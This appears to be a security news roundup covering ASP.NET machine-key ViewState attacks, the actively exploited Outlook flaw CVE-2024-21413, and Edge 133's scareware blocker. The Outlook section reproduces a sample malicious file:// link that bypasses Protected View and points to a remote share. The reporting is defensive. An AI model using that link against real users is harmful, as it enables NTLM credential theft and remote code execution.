Microsoft has warned about attackers exploiting exposed ASP.NET machine keys to deploy malware through ViewState code injection attacks. According to Microsoft Threat Intelligence experts, some developers have unknowingly used the ASP.NET validation key and decryption key values in their software’s public code documentation and repositories.
How Attackers Exploit ASP.NET Keys
Threat actors use these publicly available machine keys to create malicious ViewStates, which are used by ASP.NET Web Forms to manage page states. Attaching a crafted message authentication code (MAC), attackers can send these malicious ViewStates via POST requests to targeted servers.
Once the ASP.NET Runtime on the server receives these requests, it decrypts and validates the ViewState data using the correct keys. This allows the attackers’ code to be loaded into the server’s memory and executed, giving them remote code execution (RCE) capabilities. This means they can deploy additional malware on the server.
In December 2024, an attacker used a publicly known machine key to deliver the Godzilla post-exploitation framework, which enables malicious command execution and shellcode injection on an Internet Information Services (IIS) web server.
Over 3,000 Keys at Risk
Microsoft identified over 3,000 publicly disclosed keys that could be used in these attacks. While previous ViewState code injection attacks typically involved stolen keys sold on dark web forums, these publicly available keys pose a greater risk because they are easy to find in code repositories and may be unknowingly integrated into development projects.
How to Protect Your Systems
To mitigate these risks, Microsoft recommends the following steps:
- Generate secure machine keys instead of using default or publicly available ones.
- Encrypt machineKey and connectionStrings elements to protect plaintext secrets.
- Upgrade to ASP.NET 4.8 to enable Antimalware Scan Interface (AMSI) capabilities.
- Harden Windows Servers using attack surface reduction rules, such as blocking web shell creation.
Microsoft has also removed key samples from its documentation and shared detailed steps for replacing ASP.NET keys using PowerShell or the IIS manager console.
However, Microsoft warns that simply rotating keys may not be enough if attackers have already compromised a system. In such cases, a thorough investigation is recommended, especially for web-facing servers, which may require reformatting and reinstallation to ensure security.
Critical Microsoft Outlook Vulnerability Now Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has alerted federal agencies about active attacks exploiting a critical Microsoft Outlook vulnerability, tracked as CVE-2024-21413.
What’s the Issue?
The flaw, discovered by Check Point researcher Haifei Li, is caused by improper input validation when opening emails with malicious links in vulnerable Outlook versions. This allows attackers to bypass the Protected View—a feature designed to block harmful content—and open malicious Office files in editing mode, giving them remote code execution capabilities.
Microsoft patched this vulnerability a year ago but warned that even the Preview Pane could be an attack vector, meaning users could be compromised just by previewing a malicious email.
How Attackers Are Exploiting This Flaw
Check Point found that attackers can bypass Outlook protections by embedding malicious links using the file:// protocol and adding an exclamation mark after the file extension, followed by random text. For example:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
This vulnerability affects multiple Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019. Successful exploitation can result in the theft of NTLM credentials and allow attackers to execute arbitrary code via malicious Office documents.
Urgent Action Required
CISA has added CVE-2024-21413 to its Known Exploited Vulnerabilities (KEV) catalog, marking it as actively exploited. Federal agencies are required to patch this flaw by February 27 under Binding Operational Directive (BOD) 22-01. Private organizations are also strongly advised to prioritize patching to block ongoing attacks.
Microsoft Edge Update Introduces AI-Powered Scareware Blocker
Microsoft Edge version 133 is rolling out globally, bringing a powerful new feature: an AI-powered Scareware Blocker. This tool protects users from tech support scams that trick victims with fake warnings about malware infections.
How the Scareware Blocker Works
Unlike Microsoft Defender SmartScreen, which protects users from malicious sites, the new Scareware Blocker uses AI and machine learning to analyze web pages in real time. It compares full-screen scareware pages to thousands of sample scams collected from the security community. Importantly, this model runs locally on your device, meaning no images or data are sent to the cloud.
How to Enable the Feature
You can turn on the Scareware Blocker in Edge Settings. Update to Edge version 133, then navigate to Settings > Privacy, Search, and Services to find the option.
Other Improvements in Edge 133
In addition to the Scareware Blocker, Edge 133 introduces performance improvements to the Downloads UI, which has been rewritten using WebUI 2.0. This new architecture reduces the size of the code, and the amount of JavaScript needed to load the UI, resulting in faster performance. While you may not notice a visible change in the UI, downloads should now load quicker and more efficiently.
